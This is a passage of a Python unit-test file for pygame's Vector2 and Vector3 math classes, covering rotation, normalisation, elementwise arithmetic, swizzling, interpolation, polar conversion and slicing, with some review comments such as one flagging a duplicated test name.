self.assertEqual(v3.y, v2.y)
v1 = Vector2(-1, -1)
v2 = v1.rotate(-90)
self.assertEqual(v2.x, -1)
self.assertEqual(v2.y, 1)
v2 = v1.rotate(360)
self.assertEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
v2 = v1.rotate(0)
self.assertEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
# issue 214
self.assertEqual(Vector2(0, 1).rotate(359.99999999), Vector2(0, 1))
def test_rotate_ip(self):
v = Vector2(1, 0)
self.assertEqual(v.rotate_ip(90), None)
self.assertEqual(v.x, 0)
self.assertEqual(v.y, 1)
v = Vector2(-1, -1)
v.rotate_ip(-90)
self.assertEqual(v.x, -1)
self.assertEqual(v.y, 1)
def test_normalize(self):
v = self.v1.normalize()
# length is 1
self.assertAlmostEqual(v.x * v.x + v.y * v.y, 1.)
# v1 is unchanged
self.assertEqual(self.v1.x, self.l1[0])
self.assertEqual(self.v1.y, self.l1[1])
# v2 is paralell to v1
self.assertAlmostEqual(self.v1.x * v.y - self.v1.y * v.x, 0.)
self.assertRaises(ValueError, lambda : self.zeroVec.normalize())
def test_normalize_ip(self):
v = +self.v1
# v has length != 1 before normalizing
self.assertNotEqual(v.x * v.x + v.y * v.y, 1.)
# inplace operations should return None
self.assertEqual(v.normalize_ip(), None)
# length is 1
self.assertAlmostEqual(v.x * v.x + v.y * v.y, 1.)
# v2 is paralell to v1
self.assertAlmostEqual(self.v1.x * v.y - self.v1.y * v.x, 0.)
self.assertRaises(ValueError, lambda : self.zeroVec.normalize_ip())
def test_is_normalized(self):
self.assertEqual(self.v1.is_normalized(), False)
v = self.v1.normalize()
self.assertEqual(v.is_normalized(), True)
self.assertEqual(self.e2.is_normalized(), True)
self.assertEqual(self.zeroVec.is_normalized(), False)
def test_cross(self):
self.assertEqual(self.v1.cross(self.v2),
self.v1.x * self.v2.y - self.v1.y * self.v2.x)
self.assertEqual(self.v1.cross(self.l2),
self.v1.x * self.l2[1] - self.v1.y * self.l2[0])
self.assertEqual(self.v1.cross(self.t2),
self.v1.x * self.t2[1] - self.v1.y * self.t2[0])
self.assertEqual(self.v1.cross(self.v2), -self.v2.cross(self.v1))
self.assertEqual(self.v1.cross(self.v1), 0)
def test_dot(self):
self.assertAlmostEqual(self.v1.dot(self.v2),
self.v1.x * self.v2.x + self.v1.y * self.v2.y)
self.assertAlmostEqual(self.v1.dot(self.l2),
self.v1.x * self.l2[0] + self.v1.y * self.l2[1])
self.assertAlmostEqual(self.v1.dot(self.t2),
self.v1.x * self.t2[0] + self.v1.y * self.t2[1])
self.assertEqual(self.v1.dot(self.v2), self.v2.dot(self.v1))
self.assertEqual(self.v1.dot(self.v2), self.v1 * self.v2)
def test_angle_to(self):
self.assertEqual(self.v1.rotate(self.v1.angle_to(self.v2)).normalize(),
self.v2.normalize())
self.assertEqual(Vector2(1, 1).angle_to((-1, 1)), 90)
self.assertEqual(Vector2(1, 0).angle_to((0, -1)), -90)
self.assertEqual(Vector2(1, 0).angle_to((-1, 1)), 135)
self.assertEqual(abs(Vector2(1, 0).angle_to((-1, 0))), 180)
def test_scale_to_length(self):
v = Vector2(1, 1)
v.scale_to_length(2.5)
self.assertEqual(v, Vector2(2.5, 2.5) / math.sqrt(2))
self.assertRaises(ValueError, lambda : self.zeroVec.scale_to_length(1))
self.assertEqual(v.scale_to_length(0), None)
self.assertEqual(v, self.zeroVec)
def test_length(self):
self.assertEqual(Vector2(3, 4).length(), 5)
self.assertEqual(Vector2(-3, 4).length(), 5)
self.assertEqual(self.zeroVec.length(), 0)
def test_length_squared(self):
self.assertEqual(Vector2(3, 4).length_squared(), 25)
self.assertEqual(Vector2(-3, 4).length_squared(), 25)
self.assertEqual(self.zeroVec.length_squared(), 0)
def test_reflect(self):
v = Vector2(1, -1)
n = Vector2(0, 1)
self.assertEqual(v.reflect(n), Vector2(1, 1))
self.assertEqual(v.reflect(3*n), v.reflect(n))
self.assertEqual(v.reflect(-v), -v)
self.assertRaises(ValueError, lambda : v.reflect(self.zeroVec))
def test_reflect_ip(self):
v1 = Vector2(1, -1)
v2 = Vector2(v1)
n = Vector2(0, 1)
self.assertEqual(v2.reflect_ip(n), None)
self.assertEqual(v2, Vector2(1, 1))
v2 = Vector2(v1)
v2.reflect_ip(3*n)
self.assertEqual(v2, v1.reflect(n))
v2 = Vector2(v1)
v2.reflect_ip(-v1)
self.assertEqual(v2, -v1)
self.assertRaises(ValueError, lambda : v2.reflect_ip(Vector2()))
def test_distance_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_to(self.e2), math.sqrt(2))
self.assertAlmostEqual(self.v1.distance_to(self.v2),
math.sqrt(diff.x * diff.x + diff.y * diff.y))
self.assertEqual(self.v1.distance_to(self.v1), 0)
self.assertEqual(self.v1.distance_to(self.v2),
self.v2.distance_to(self.v1))
def test_distance_squared_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_squared_to(self.e2), 2)
self.assertAlmostEqual(self.v1.distance_squared_to(self.v2),
diff.x * diff.x + diff.y * diff.y)
self.assertEqual(self.v1.distance_squared_to(self.v1), 0)
self.assertEqual(self.v1.distance_squared_to(self.v2),
self.v2.distance_squared_to(self.v1))
def test_update(self):
v = Vector2(3, 4)
v.update(0)
self.assertEqual(v, Vector2((0, 0)))
v.update(5, 1)
self.assertEqual(v, Vector2(5, 1))
v.update((4, 1))
self.assertNotEqual(v, Vector2((5, 1)))
def test_swizzle(self):
self.assertTrue(hasattr(pygame.math, "enable_swizzling"))
self.assertTrue(hasattr(pygame.math, "disable_swizzling"))
# swizzling not disabled by default
pygame.math.disable_swizzling()
self.assertRaises(AttributeError, lambda : self.v1.yx)
pygame.math.enable_swizzling()
self.assertEqual(self.v1.yx, (self.v1.y, self.v1.x))
self.assertEqual(self.v1.xxyyxy, (self.v1.x, self.v1.x, self.v1.y,
self.v1.y, self.v1.x, self.v1.y))
self.v1.xy = self.t2
self.assertEqual(self.v1, self.t2)
self.v1.yx = self.t2
self.assertEqual(self.v1, (self.t2[1], self.t2[0]))
self.assertEqual(type(self.v1), Vector2)
def invalidSwizzleX():
Vector2().xx = (1, 2)
def invalidSwizzleY():
Vector2().yy = (1, 2)
self.assertRaises(AttributeError, invalidSwizzleX)
self.assertRaises(AttributeError, invalidSwizzleY)
def invalidAssignment():
Vector2().xy = 3
self.assertRaises(TypeError, invalidAssignment)
def unicodeAttribute():
getattr(Vector2(), "ä")
self.assertRaises(AttributeError, unicodeAttribute)
def test_swizzle_return_types(self):
self.assertEqual(type(self.v1.x), float)
self.assertEqual(type(self.v1.xy), Vector2)
self.assertEqual(type(self.v1.xyx), Vector3)
# but we don't have vector4 or above... so tuple.
self.assertEqual(type(self.v1.xyxy), tuple)
self.assertEqual(type(self.v1.xyxyx), tuple)
    def test_elementwise(self):
        # NOTE(review): a second ``def test_elementwise`` appears later
        # in this class, so Python discards THIS definition at
        # class-creation time and it never runs.  Rename one of the two
        # (e.g. test_elementwise_verbose) so both are executed.
        # behaviour for "elementwise op scalar"
        self.assertEqual(self.v1.elementwise() + self.s1,
                         (self.v1.x + self.s1, self.v1.y + self.s1))
        self.assertEqual(self.v1.elementwise() - self.s1,
                         (self.v1.x - self.s1, self.v1.y - self.s1))
        self.assertEqual(self.v1.elementwise() * self.s2,
                         (self.v1.x * self.s2, self.v1.y * self.s2))
        self.assertEqual(self.v1.elementwise() / self.s2,
                         (self.v1.x / self.s2, self.v1.y / self.s2))
        self.assertEqual(self.v1.elementwise() // self.s1,
                         (self.v1.x // self.s1, self.v1.y // self.s1))
        self.assertEqual(self.v1.elementwise() ** self.s1,
                         (self.v1.x ** self.s1, self.v1.y ** self.s1))
        self.assertEqual(self.v1.elementwise() % self.s1,
                         (self.v1.x % self.s1, self.v1.y % self.s1))
        self.assertEqual(self.v1.elementwise() > self.s1,
                         self.v1.x > self.s1 and self.v1.y > self.s1)
        self.assertEqual(self.v1.elementwise() < self.s1,
                         self.v1.x < self.s1 and self.v1.y < self.s1)
        self.assertEqual(self.v1.elementwise() == self.s1,
                         self.v1.x == self.s1 and self.v1.y == self.s1)
        self.assertEqual(self.v1.elementwise() != self.s1,
                         self.v1.x != self.s1 and self.v1.y != self.s1)
        self.assertEqual(self.v1.elementwise() >= self.s1,
                         self.v1.x >= self.s1 and self.v1.y >= self.s1)
        self.assertEqual(self.v1.elementwise() <= self.s1,
                         self.v1.x <= self.s1 and self.v1.y <= self.s1)
        self.assertEqual(self.v1.elementwise() != self.s1,
                         self.v1.x != self.s1 and self.v1.y != self.s1)
        # behaviour for "scalar op elementwise"
        self.assertEqual(5 + self.v1.elementwise(), Vector2(5, 5) + self.v1)
        self.assertEqual(3.5 - self.v1.elementwise(), Vector2(3.5, 3.5) - self.v1)
        self.assertEqual(7.5 * self.v1.elementwise() , 7.5 * self.v1)
        self.assertEqual(-3.5 / self.v1.elementwise(), (-3.5 / self.v1.x, -3.5 / self.v1.y))
        self.assertEqual(-3.5 // self.v1.elementwise(), (-3.5 // self.v1.x, -3.5 // self.v1.y))
        self.assertEqual(-3.5 ** self.v1.elementwise(), (-3.5 ** self.v1.x, -3.5 ** self.v1.y))
        self.assertEqual(3 % self.v1.elementwise(), (3 % self.v1.x, 3 % self.v1.y))
        self.assertEqual(2 < self.v1.elementwise(), 2 < self.v1.x and 2 < self.v1.y)
        self.assertEqual(2 > self.v1.elementwise(), 2 > self.v1.x and 2 > self.v1.y)
        self.assertEqual(1 == self.v1.elementwise(), 1 == self.v1.x and 1 == self.v1.y)
        self.assertEqual(1 != self.v1.elementwise(), 1 != self.v1.x and 1 != self.v1.y)
        self.assertEqual(2 <= self.v1.elementwise(), 2 <= self.v1.x and 2 <= self.v1.y)
        self.assertEqual(-7 >= self.v1.elementwise(), -7 >= self.v1.x and -7 >= self.v1.y)
        self.assertEqual(-7 != self.v1.elementwise(), -7 != self.v1.x and -7 != self.v1.y)
        # behaviour for "elementwise op vector"
        self.assertEqual(type(self.v1.elementwise() * self.v2), type(self.v1))
        self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
        self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
        self.assertEqual(self.v1.elementwise() - self.v2, self.v1 - self.v2)
        self.assertEqual(self.v1.elementwise() * self.v2, (self.v1.x * self.v2.x, self.v1.y * self.v2.y))
        self.assertEqual(self.v1.elementwise() / self.v2, (self.v1.x / self.v2.x, self.v1.y / self.v2.y))
        self.assertEqual(self.v1.elementwise() // self.v2, (self.v1.x // self.v2.x, self.v1.y // self.v2.y))
        self.assertEqual(self.v1.elementwise() ** self.v2, (self.v1.x ** self.v2.x, self.v1.y ** self.v2.y))
        self.assertEqual(self.v1.elementwise() % self.v2, (self.v1.x % self.v2.x, self.v1.y % self.v2.y))
        self.assertEqual(self.v1.elementwise() > self.v2, self.v1.x > self.v2.x and self.v1.y > self.v2.y)
        self.assertEqual(self.v1.elementwise() < self.v2, self.v1.x < self.v2.x and self.v1.y < self.v2.y)
        self.assertEqual(self.v1.elementwise() >= self.v2, self.v1.x >= self.v2.x and self.v1.y >= self.v2.y)
        self.assertEqual(self.v1.elementwise() <= self.v2, self.v1.x <= self.v2.x and self.v1.y <= self.v2.y)
        self.assertEqual(self.v1.elementwise() == self.v2, self.v1.x == self.v2.x and self.v1.y == self.v2.y)
        self.assertEqual(self.v1.elementwise() != self.v2, self.v1.x != self.v2.x and self.v1.y != self.v2.y)
        # behaviour for "vector op elementwise"
        self.assertEqual(self.v2 + self.v1.elementwise(), self.v2 + self.v1)
        self.assertEqual(self.v2 - self.v1.elementwise(), self.v2 - self.v1)
        self.assertEqual(self.v2 * self.v1.elementwise(), (self.v2.x * self.v1.x, self.v2.y * self.v1.y))
        self.assertEqual(self.v2 / self.v1.elementwise(), (self.v2.x / self.v1.x, self.v2.y / self.v1.y))
        self.assertEqual(self.v2 // self.v1.elementwise(), (self.v2.x // self.v1.x, self.v2.y // self.v1.y))
        self.assertEqual(self.v2 ** self.v1.elementwise(), (self.v2.x ** self.v1.x, self.v2.y ** self.v1.y))
        self.assertEqual(self.v2 % self.v1.elementwise(), (self.v2.x % self.v1.x, self.v2.y % self.v1.y))
        self.assertEqual(self.v2 < self.v1.elementwise(), self.v2.x < self.v1.x and self.v2.y < self.v1.y)
        self.assertEqual(self.v2 > self.v1.elementwise(), self.v2.x > self.v1.x and self.v2.y > self.v1.y)
        self.assertEqual(self.v2 <= self.v1.elementwise(), self.v2.x <= self.v1.x and self.v2.y <= self.v1.y)
        self.assertEqual(self.v2 >= self.v1.elementwise(), self.v2.x >= self.v1.x and self.v2.y >= self.v1.y)
        self.assertEqual(self.v2 == self.v1.elementwise(), self.v2.x == self.v1.x and self.v2.y == self.v1.y)
        self.assertEqual(self.v2 != self.v1.elementwise(), self.v2.x != self.v1.x and self.v2.y != self.v1.y)
        # behaviour for "elementwise op elementwise"
        self.assertEqual(self.v2.elementwise() + self.v1.elementwise(), self.v2 + self.v1)
        self.assertEqual(self.v2.elementwise() - self.v1.elementwise(), self.v2 - self.v1)
        self.assertEqual(self.v2.elementwise() * self.v1.elementwise(), (self.v2.x * self.v1.x, self.v2.y * self.v1.y))
        self.assertEqual(self.v2.elementwise() / self.v1.elementwise(), (self.v2.x / self.v1.x, self.v2.y / self.v1.y))
        self.assertEqual(self.v2.elementwise() // self.v1.elementwise(), (self.v2.x // self.v1.x, self.v2.y // self.v1.y))
        self.assertEqual(self.v2.elementwise() ** self.v1.elementwise(), (self.v2.x ** self.v1.x, self.v2.y ** self.v1.y))
        self.assertEqual(self.v2.elementwise() % self.v1.elementwise(), (self.v2.x % self.v1.x, self.v2.y % self.v1.y))
        self.assertEqual(self.v2.elementwise() < self.v1.elementwise(), self.v2.x < self.v1.x and self.v2.y < self.v1.y)
        self.assertEqual(self.v2.elementwise() > self.v1.elementwise(), self.v2.x > self.v1.x and self.v2.y > self.v1.y)
        self.assertEqual(self.v2.elementwise() <= self.v1.elementwise(), self.v2.x <= self.v1.x and self.v2.y <= self.v1.y)
        self.assertEqual(self.v2.elementwise() >= self.v1.elementwise(), self.v2.x >= self.v1.x and self.v2.y >= self.v1.y)
        self.assertEqual(self.v2.elementwise() == self.v1.elementwise(), self.v2.x == self.v1.x and self.v2.y == self.v1.y)
        self.assertEqual(self.v2.elementwise() != self.v1.elementwise(), self.v2.x != self.v1.x and self.v2.y != self.v1.y)
        # other behaviour
        self.assertEqual(abs(self.v1.elementwise()), (abs(self.v1.x), abs(self.v1.y)))
        self.assertEqual(-self.v1.elementwise(), -self.v1)
        self.assertEqual(+self.v1.elementwise(), +self.v1)
        self.assertEqual(bool(self.v1.elementwise()), bool(self.v1))
        self.assertEqual(bool(Vector2().elementwise()), bool(Vector2()))
        self.assertEqual(self.zeroVec.elementwise() ** 0, (1, 1))
        self.assertRaises(ValueError, lambda : pow(Vector2(-1, 0).elementwise(), 1.2))
        self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
def test_elementwise(self):
v1 = self.v1
v2 = self.v2
s1 = self.s1
s2 = self.s2
# behaviour for "elementwise op scalar"
self.assertEqual(v1.elementwise() + s1, (v1.x + s1, v1.y + s1))
self.assertEqual(v1.elementwise() - s1, (v1.x - s1, v1.y - s1))
self.assertEqual(v1.elementwise() * s2, (v1.x * s2, v1.y * s2))
self.assertEqual(v1.elementwise() / s2, (v1.x / s2, v1.y / s2))
self.assertEqual(v1.elementwise() // s1, (v1.x // s1, v1.y // s1))
self.assertEqual(v1.elementwise() ** s1, (v1.x ** s1, v1.y ** s1))
self.assertEqual(v1.elementwise() % s1, (v1.x % s1, v1.y % s1))
self.assertEqual(v1.elementwise() > s1, v1.x > s1 and v1.y > s1)
self.assertEqual(v1.elementwise() < s1, v1.x < s1 and v1.y < s1)
self.assertEqual(v1.elementwise() == s1, v1.x == s1 and v1.y == s1)
self.assertEqual(v1.elementwise() != s1, v1.x != s1 and v1.y != s1)
self.assertEqual(v1.elementwise() >= s1, v1.x >= s1 and v1.y >= s1)
self.assertEqual(v1.elementwise() <= s1, v1.x <= s1 and v1.y <= s1)
self.assertEqual(v1.elementwise() != s1, v1.x != s1 and v1.y != s1)
# behaviour for "scalar op elementwise"
self.assertEqual(s1 + v1.elementwise(), (s1 + v1.x, s1 + v1.y))
self.assertEqual(s1 - v1.elementwise(), (s1 - v1.x, s1 - v1.y))
self.assertEqual(s1 * v1.elementwise(), (s1 * v1.x, s1 * v1.y))
self.assertEqual(s1 / v1.elementwise(), (s1 / v1.x, s1 / v1.y))
self.assertEqual(s1 // v1.elementwise(), (s1 // v1.x, s1 // v1.y))
self.assertEqual(s1 ** v1.elementwise(), (s1 ** v1.x, s1 ** v1.y))
self.assertEqual(s1 % v1.elementwise(), (s1 % v1.x, s1 % v1.y))
self.assertEqual(s1 < v1.elementwise(), s1 < v1.x and s1 < v1.y)
self.assertEqual(s1 > v1.elementwise(), s1 > v1.x and s1 > v1.y)
self.assertEqual(s1 == v1.elementwise(), s1 == v1.x and s1 == v1.y)
self.assertEqual(s1 != v1.elementwise(), s1 != v1.x and s1 != v1.y)
self.assertEqual(s1 <= v1.elementwise(), s1 <= v1.x and s1 <= v1.y)
self.assertEqual(s1 >= v1.elementwise(), s1 >= v1.x and s1 >= v1.y)
self.assertEqual(s1 != v1.elementwise(), s1 != v1.x and s1 != v1.y)
# behaviour for "elementwise op vector"
self.assertEqual(type(v1.elementwise() * v2), type(v1))
self.assertEqual(v1.elementwise() + v2, v1 + v2)
self.assertEqual(v1.elementwise() - v2, v1 - v2)
self.assertEqual(v1.elementwise() * v2, (v1.x * v2.x, v1.y * v2.y))
self.assertEqual(v1.elementwise() / v2, (v1.x / v2.x, v1.y / v2.y))
self.assertEqual(v1.elementwise() // v2, (v1.x // v2.x, v1.y // v2.y))
self.assertEqual(v1.elementwise() ** v2, (v1.x ** v2.x, v1.y ** v2.y))
self.assertEqual(v1.elementwise() % v2, (v1.x % v2.x, v1.y % v2.y))
self.assertEqual(v1.elementwise() > v2, v1.x > v2.x and v1.y > v2.y)
self.assertEqual(v1.elementwise() < v2, v1.x < v2.x and v1.y < v2.y)
self.assertEqual(v1.elementwise() >= v2, v1.x >= v2.x and v1.y >= v2.y)
self.assertEqual(v1.elementwise() <= v2, v1.x <= v2.x and v1.y <= v2.y)
self.assertEqual(v1.elementwise() == v2, v1.x == v2.x and v1.y == v2.y)
self.assertEqual(v1.elementwise() != v2, v1.x != v2.x and v1.y != v2.y)
# behaviour for "vector op elementwise"
self.assertEqual(v2 + v1.elementwise(), v2 + v1)
self.assertEqual(v2 - v1.elementwise(), v2 - v1)
self.assertEqual(v2 * v1.elementwise(), (v2.x * v1.x, v2.y * v1.y))
self.assertEqual(v2 / v1.elementwise(), (v2.x / v1.x, v2.y / v1.y))
self.assertEqual(v2 // v1.elementwise(), (v2.x // v1.x, v2.y // v1.y))
self.assertEqual(v2 ** v1.elementwise(), (v2.x ** v1.x, v2.y ** v1.y))
self.assertEqual(v2 % v1.elementwise(), (v2.x % v1.x, v2.y % v1.y))
self.assertEqual(v2 < v1.elementwise(), v2.x < v1.x and v2.y < v1.y)
self.assertEqual(v2 > v1.elementwise(), v2.x > v1.x and v2.y > v1.y)
self.assertEqual(v2 <= v1.elementwise(), v2.x <= v1.x and v2.y <= v1.y)
self.assertEqual(v2 >= v1.elementwise(), v2.x >= v1.x and v2.y >= v1.y)
self.assertEqual(v2 == v1.elementwise(), v2.x == v1.x and v2.y == v1.y)
self.assertEqual(v2 != v1.elementwise(), v2.x != v1.x and v2.y != v1.y)
# behaviour for "elementwise op elementwise"
self.assertEqual(v2.elementwise() + v1.elementwise(), v2 + v1)
self.assertEqual(v2.elementwise() - v1.elementwise(), v2 - v1)
self.assertEqual(v2.elementwise() * v1.elementwise(), (v2.x * v1.x, v2.y * v1.y))
self.assertEqual(v2.elementwise() / v1.elementwise(), (v2.x / v1.x, v2.y / v1.y))
self.assertEqual(v2.elementwise() // v1.elementwise(), (v2.x // v1.x, v2.y // v1.y))
self.assertEqual(v2.elementwise() ** v1.elementwise(), (v2.x ** v1.x, v2.y ** v1.y))
self.assertEqual(v2.elementwise() % v1.elementwise(), (v2.x % v1.x, v2.y % v1.y))
self.assertEqual(v2.elementwise() < v1.elementwise(), v2.x < v1.x and v2.y < v1.y)
self.assertEqual(v2.elementwise() > v1.elementwise(), v2.x > v1.x and v2.y > v1.y)
self.assertEqual(v2.elementwise() <= v1.elementwise(), v2.x <= v1.x and v2.y <= v1.y)
self.assertEqual(v2.elementwise() >= v1.elementwise(), v2.x >= v1.x and v2.y >= v1.y)
self.assertEqual(v2.elementwise() == v1.elementwise(), v2.x == v1.x and v2.y == v1.y)
self.assertEqual(v2.elementwise() != v1.elementwise(), v2.x != v1.x and v2.y != v1.y)
# other behaviour
self.assertEqual(abs(v1.elementwise()), (abs(v1.x), abs(v1.y)))
self.assertEqual(-v1.elementwise(), -v1)
self.assertEqual(+v1.elementwise(), +v1)
self.assertEqual(bool(v1.elementwise()), bool(v1))
self.assertEqual(bool(Vector2().elementwise()), bool(Vector2()))
self.assertEqual(self.zeroVec.elementwise() ** 0, (1, 1))
self.assertRaises(ValueError, lambda : pow(Vector2(-1, 0).elementwise(), 1.2))
self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() / 0)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() // 0)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() % 0)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() / self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() // self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() % self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : 2 / self.zeroVec.elementwise())
self.assertRaises(ZeroDivisionError, lambda : 2 // self.zeroVec.elementwise())
self.assertRaises(ZeroDivisionError, lambda : 2 % self.zeroVec.elementwise())
def test_slerp(self):
self.assertRaises(ValueError, lambda : self.zeroVec.slerp(self.v1, .5))
self.assertRaises(ValueError, lambda : self.v1.slerp(self.zeroVec, .5))
self.assertRaises(ValueError,
lambda : self.zeroVec.slerp(self.zeroVec, .5))
v1 = Vector2(1, 0)
v2 = Vector2(0, 1)
steps = 10
angle_step = v1.angle_to(v2) / steps
for i, u in ((i, v1.slerp(v2, i/float(steps))) for i in range(steps+1)):
self.assertAlmostEqual(u.length(), 1)
self.assertAlmostEqual(v1.angle_to(u), i * angle_step)
self.assertEqual(u, v2)
v1 = Vector2(100, 0)
v2 = Vector2(0, 10)
radial_factor = v2.length() / v1.length()
for i, u in ((i, v1.slerp(v2, -i/float(steps))) for i in range(steps+1)):
self.assertAlmostEqual(u.length(), (v2.length() - v1.length()) * (float(i)/steps) + v1.length())
self.assertEqual(u, v2)
self.assertEqual(v1.slerp(v1, .5), v1)
self.assertEqual(v2.slerp(v2, .5), v2)
self.assertRaises(ValueError, lambda : v1.slerp(-v1, 0.5))
def test_lerp(self):
v1 = Vector2(0, 0)
v2 = Vector2(10, 10)
self.assertEqual(v1.lerp(v2, 0.5), (5, 5))
self.assertRaises(ValueError, lambda : v1.lerp(v2, 2.5))
v1 = Vector2(-10, -5)
v2 = Vector2(10, 10)
self.assertEqual(v1.lerp(v2, 0.5), (0, 2.5))
def test_polar(self):
v = Vector2()
v.from_polar(self.v1.as_polar())
self.assertEqual(self.v1, v)
self.assertEqual(self.e1.as_polar(), (1, 0))
self.assertEqual(self.e2.as_polar(), (1, 90))
self.assertEqual((2 * self.e2).as_polar(), (2, 90))
self.assertRaises(TypeError, lambda : v.from_polar((None, None)))
self.assertRaises(TypeError, lambda : v.from_polar("ab"))
self.assertRaises(TypeError, lambda : v.from_polar((None, 1)))
self.assertRaises(TypeError, lambda : v.from_polar((1, 2, 3)))
self.assertRaises(TypeError, lambda : v.from_polar((1,)))
self.assertRaises(TypeError, lambda : v.from_polar(1, 2))
v.from_polar((.5, 90))
self.assertEqual(v, .5 * self.e2)
v.from_polar((1, 0))
self.assertEqual(v, self.e1)
def test_subclass_operation(self):
class Vector(pygame.math.Vector2):
pass
vec = Vector()
vec_a = Vector(2, 0)
vec_b = Vector(0, 1)
vec_a + vec_b
vec_a *= 2
class Vector3TypeTest(unittest.TestCase):
    def setUp(self):
        """Create the fixture values shared by every Vector3 test."""
        self.zeroVec = Vector3()
        # unit vectors along the x, y and z axes
        self.e1 = Vector3(1, 0, 0)
        self.e2 = Vector3(0, 1, 0)
        self.e3 = Vector3(0, 0, 1)
        # the same three components as a tuple, a list and a vector
        self.t1 = (1.2, 3.4, 9.6)
        self.l1 = list(self.t1)
        self.v1 = Vector3(self.t1)
        self.t2 = (5.6, 7.8, 2.1)
        self.l2 = list(self.t2)
        self.v2 = Vector3(self.t2)
        # plain scalars for vector-scalar operator tests
        self.s1 = 5.6
        self.s2 = 7.8
def testConstructionDefault(self):
v = Vector3()
self.assertEqual(v.x, 0.)
self.assertEqual(v.y, 0.)
self.assertEqual(v.z, 0.)
def testConstructionXYZ(self):
v = Vector3(1.2, 3.4, 9.6)
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, 9.6)
def testConstructionTuple(self):
v = Vector3((1.2, 3.4, 9.6))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, 9.6)
def testConstructionList(self):
v = Vector3([1.2, 3.4, -9.6])
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, -9.6)
def testConstructionVector3(self):
v = Vector3(Vector3(1.2, 3.4, -9.6))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, -9.6)
def testConstructionScalar(self):
v = Vector3(1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
self.assertEqual(v.z, 1.)
def testConstructionScalarKeywords(self):
v = Vector3(x=1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
self.assertEqual(v.z, 1.)
def testConstructionKeywords(self):
v = Vector3(x=1, y=2, z=3)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 2.)
self.assertEqual(v.z, 3.)
def testConstructionMissing(self):
def assign_missing_value():
v = Vector3(1, 2)
self.assertRaises(ValueError, assign_missing_value)
def assign_missing_value():
v = Vector3(x=1, y=2)
self.assertRaises(ValueError, assign_missing_value)
def testAttributAccess(self):
tmp = self.v1.x
self.assertEqual(tmp, self.v1.x)
self.assertEqual(tmp, self.v1[0])
tmp = self.v1.y
self.assertEqual(tmp, self.v1.y)
self.assertEqual(tmp, self.v1[1])
tmp = self.v1.z
self.assertEqual(tmp, self.v1.z)
self.assertEqual(tmp, self.v1[2])
self.v1.x = 3.141
self.assertEqual(self.v1.x, 3.141)
self.v1.y = 3.141
self.assertEqual(self.v1.y, 3.141)
self.v1.z = 3.141
self.assertEqual(self.v1.z, 3.141)
def assign_nonfloat():
v = Vector2()
v.x = "spam"
self.assertRaises(TypeError, assign_nonfloat)
def testSequence(self):
v = Vector3(1.2, 3.4, -9.6)
self.assertEqual(len(v), 3)
self.assertEqual(v[0], 1.2)
self.assertEqual(v[1], 3.4)
self.assertEqual(v[2], -9.6)
self.assertRaises(IndexError, lambda : v[3])
self.assertEqual(v[-1], -9.6)
self.assertEqual(v[-2], 3.4)
self.assertEqual(v[-3], 1.2)
self.assertRaises(IndexError, lambda : v[-4])
self.assertEqual(v[:], [1.2, 3.4, -9.6])
self.assertEqual(v[1:], [3.4, -9.6])
self.assertEqual(v[:1], [1.2])
self.assertEqual(v[:-1], [1.2, 3.4])
self.assertEqual(v[1:2], [3.4])
self.assertEqual(list(v), [1.2, 3.4, -9.6])
self.assertEqual(tuple(v), (1.2, 3.4, -9.6))
v[0] = 5.6
v[1] = 7.8
v[2] = -2.1
self.assertEqual(v.x, 5.6)
self.assertEqual(v.y, 7.8)
self.assertEqual(v.z, -2.1)
v[:] = [9.1, 11.12, -13.41]
self.assertEqual(v.x, 9.1)
self.assertEqual(v.y, 11.12)
self.assertEqual(v.z, -13.41)
def overpopulate():
v = Vector3()
v[:] = [1, 2, 3, 4]
self.assertRaises(ValueError, overpopulate)
def underpopulate():
v = Vector3()
v[:] = [1]
self.assertRaises(ValueError, underpopulate)
def assign_nonfloat():
v = Vector2()
v[0] = "spam"
self.assertRaises(TypeError, assign_nonfloat)
    def testExtendedSlicing(self):
        """Extended slices: deleting components is forbidden; stepped and
        reversed slice assignment works and keeps the Vector3 type."""
        # deletion
        def delSlice(vec, start=None, stop=None, step=None):
            if start is not None and stop is not None and step is not None:
                del vec[start:stop:step]
            elif start is not None and stop is None and step is not None:
                del vec[start::step]
            elif start is None and stop is None and step is not None:
                del vec[::step]
        v = Vector3(self.v1)
        self.assertRaises(TypeError, delSlice, v, None, None, 2)
        self.assertRaises(TypeError, delSlice, v, 1, None, 2)
        self.assertRaises(TypeError, delSlice, v, 1, 2, 1)
        # assignment
        v = Vector3(self.v1)
        v[::2] = [-1.1, -2.2]
        self.assertEqual(v, [-1.1, self.v1.y, -2.2])
        v = Vector3(self.v1)
        v[::-2] = [10, 20]
        self.assertEqual(v, [20, self.v1.y, 10])
        v = Vector3(self.v1)
        # self-assignment through a reversed slice swaps x and z
        v[::-1] = v
        self.assertEqual(v, [self.v1.z, self.v1.y, self.v1.x])
        a = Vector3(self.v1)
        b = Vector3(self.v1)
        c = Vector3(self.v1)
        # the three spellings of the same slice must behave identically
        a[1:2] = [2.2]
